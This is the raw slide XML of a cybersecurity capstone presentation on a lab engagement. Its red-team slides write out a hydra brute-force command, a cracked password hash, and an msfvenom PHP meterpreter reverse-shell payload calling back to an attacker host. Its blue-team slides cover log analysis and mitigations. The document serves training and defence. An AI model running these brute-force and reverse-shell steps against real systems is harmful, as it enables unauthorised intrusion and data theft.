                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>From a web browser, the Red Team was able to navigate to 192.168.1.105 and view files that indicated there was a ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ directory:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>To access the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’, we need to find the password for ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ (username was noted during authentication prompt):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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4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2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1205948"/>
            <a:ext cx="9144000" cy="172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139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  <a:p>
            <a:pPr marL="139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  <a:p>
            <a:pPr marL="139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  <a:p>
            <a:pPr marL="139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US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139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US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139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US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139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US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139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US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1122" name="Google Shape;1122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3315" y="1205948"/>
            <a:ext cx="4096385" cy="16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3" name="Google Shape;1123;p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3315" y="3464337"/>
            <a:ext cx="5128704" cy="146316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202F49E-3841-4991-8E86-DA108AFD58B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947237" y="3826589"/>
            <a:ext cx="2637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“For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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eyes only”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0E6DE8-D5AA-4D76-A6F2-04AA5A0203F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047440" y="1352547"/>
            <a:ext cx="34154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Please refer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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company_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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  <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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 for more information.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9AC653-4316-4652-9B15-D0D2D9BB9BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475615" y="4917927"/>
            <a:ext cx="71642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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Please refer to Appendix A1 &amp; A2:  Access Sensitive Information for tools and techniques used.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" name="Google Shape;1135;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-246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dirty="0"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="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b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Once the password for ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ was cracked, we wer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>e able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>access the contents of the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ directory.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" i="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400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The folder contained a file called ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" i="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2400" b="0" i="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2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p1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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1138" name="Google Shape;1138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4684" y="1865491"/>
            <a:ext cx="8618220" cy="222821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D3734C8-7DD2-46B3-B676-ACC48D334510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487994" y="4335901"/>
            <a:ext cx="6451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..use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1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ryan’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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account (Hash:d7dad0a5cd7c8376eeb50d69b3ccd352)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378</TotalTime>
  <Words>2152</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>285</Paragraphs>
  <Slides>38</Slides>
  <Notes>38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7" baseType="lpstr">
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Access Sensitive Information  From a web browser, the Red Team was able to navigate to 192.168.1.105 and view files that indicated there was a ‘secret_folder’ directory:           To access the ‘secret_folder’, we need to find the password for ‘ashton’ (username was noted during authentication prompt):      </vt:lpstr>
      <vt:lpstr>Exploitation: Access Sensitive Information (con’t)  Once the password for ‘ashton’ was cracked, we were able to access the contents of the ‘secret_folder’ directory.  The folder contained a file called ‘connect_to_corp_server’:   </vt:lpstr>
      <vt:lpstr>Exploitation: Brute Force Attacks   Brute force the password for user ‘ashton’ to access the hidden directory (secret_folder) using the hydra command:  hydra –l ashton –P /usr/share/wordlists/rockyou.txt –s 80 –f –v 192.168.1.105 http-get /company_folders/secret_folder         Break the hash password for user ‘ryan’ using the site ‘crackstation.net’:        </vt:lpstr>
      <vt:lpstr>Exploitation: File/Shell Script Uploads  Connect to the WebDav server using the username ‘ryan’ and hash password recently cracked:</vt:lpstr>
      <vt:lpstr>Exploitation: File/Shell Script Uploads (con’t)  Create and upload a reverse shell payload script called ‘shell.php’:                                   </vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Session   From the security tool Metasploit’s command line interface, we create a listener where we wait to be connected to the victim’s machine.      Victim click’s on the ‘shell.php’ file to open up a shell session on the attacker’s machine.    </vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Session (con’t)  From the meterpreter session, we are able to maneuver within the system:  Ability to download a file.          Successfully downloaded this ‘flag.txt’ file into our Kali (attacker) machine:   </vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying Capstone Traffic  From the ‘Top Hosts Creating Traffic’ report, we can see a lot of high traffic coming from the Capstone’s (victim) machine @ 192.168.1.105.                        -  There was a sudden spike over time on May 6, 2021.   </vt:lpstr>
      <vt:lpstr>Analysis: Identifying Request for Hidden Directory  From the ‘Top 10 HTTP requests’ report, we can see that the ‘/company_folders/secret_folder’ directory had a high request count. </vt:lpstr>
      <vt:lpstr>Analysis: Identifying Request for Hidden Directory (con’t)  The request for the ‘secret_folder’ directory started on May 6, 2021 @ 02:31.</vt:lpstr>
      <vt:lpstr>Analysis: Identifying Brute Force Attack  Search results for the ‘connect_to_corp_server’ file in the ‘/company_folders/secret_folder’ directory, indicates the file was successfully accessed 2 times.</vt:lpstr>
      <vt:lpstr>Analysis: Identifying Brute Force Attack (con’t)  The log from May 6, 2021 indicates that the ‘connect_to_corp_server’ file was accessed using the username ‘ashton’.</vt:lpstr>
      <vt:lpstr>Analysis: Finding WebDAV Connection  From the ‘Top 10 HTTP requests’ report, we can see the ‘http://192.168.1.105/webdav’ directory was requested 60 times.                       -  Within this directory, we were able to view files such as the ‘shell.php’ file. </vt:lpstr>
      <vt:lpstr>Analysis: Finding WebDAV Connection (con’t)  By searching for the /webdav/shell.php’ file, the search result shows the file was accessed 20 times.</vt:lpstr>
      <vt:lpstr>Analysis: Finding WebDAV Connection (con’t)  The log from May 6, 2021 indicates that the ‘/webdav/shell.php’ file was accessed using the username ‘ryan’.</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking IP Traffic</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Request for Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Appendix </vt:lpstr>
      <vt:lpstr>Appendix A1: Access Sensitive Information </vt:lpstr>
      <vt:lpstr>Appendix A2: Access Sensitive Information   Perform a port scan to retrieve host and  service information:  nmap 192.168.1.8/24                     </vt:lpstr>
      <vt:lpstr>Appendix B: Brute Force Attacks </vt:lpstr>
      <vt:lpstr>Appendix C1: File/Shell Script Uploads </vt:lpstr>
      <vt:lpstr>Appendix C2: File/Shell Script Uploads  Create and upload a reverse shell payload script:  msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4444 &gt; shell.php                 -  Using default port 4444. </vt:lpstr>
      <vt:lpstr>Appendix D1: Reverse Shell Session</vt:lpstr>
      <vt:lpstr>Appendix D2: Reverse Shell Session   Exploit used to create a listener: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Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <cp:lastModifiedBy>Tricia T</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-21T04:06:28Z</dcterms:modified>
</cp:coreProperties>
</file>